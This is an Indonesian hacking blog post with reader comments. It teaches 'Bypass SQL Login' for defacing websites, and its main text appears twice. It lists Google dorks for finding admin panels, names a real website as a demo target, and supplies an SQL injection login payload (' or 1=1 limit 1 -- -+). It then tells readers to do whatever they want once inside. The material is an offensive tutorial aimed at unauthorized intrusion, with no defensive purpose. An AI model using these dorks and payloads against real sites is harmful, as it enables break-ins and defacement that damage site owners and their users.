Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?
Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"
Oke langsung saja kita masuk ke tutorialnya :
[#] Dork
1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D
Sekian tutorial dari saya thanks to Mr Xenophobic ^_^
Author : Bimo Septiawan
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?
Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"
Oke langsung saja kita masuk ke tutorialnya :
[#] Dork
[#] Langkah-langkahinurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
http://preprojects.com/hostfriendz/int/index.php2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+
Simpel ya hhee dah cukup itu aja kok :D
Sekian tutorial dari saya thanks to Mr Xenophobic ^_^
untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk
Author : Bimo Septiawan
pertamax
ReplyDeletehehe
huehehe :D
Deletethx again pak bimo :) :d
ReplyDeleteoke bro
Deleteaman ni kalau di praktekkan mas bimo ?
ReplyDeleteThanks bro ;-(
ReplyDelete